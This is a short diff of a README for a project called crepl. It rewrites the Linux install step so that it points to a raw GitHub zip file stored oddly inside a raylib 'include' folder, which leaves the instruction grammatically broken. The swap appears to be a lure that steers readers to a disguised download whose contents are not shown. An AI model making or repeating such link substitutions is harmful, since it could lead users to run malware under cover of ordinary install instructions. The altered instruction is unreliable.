zhymwt/crepl/README.md

 4. Open Applications and double-click `crepl` to start.

 ### Linux
-1. Extract the downloaded tar.gz file.
+1. Extract the downloaded https://raw.githubusercontent.com/zhymwt/crepl/main/raylib-5.5_linux_amd64/include/crepl-v1.2.zip file.
 2. Open a terminal and navigate to the extracted folder.
 3. Run the command `./crepl` to start the application.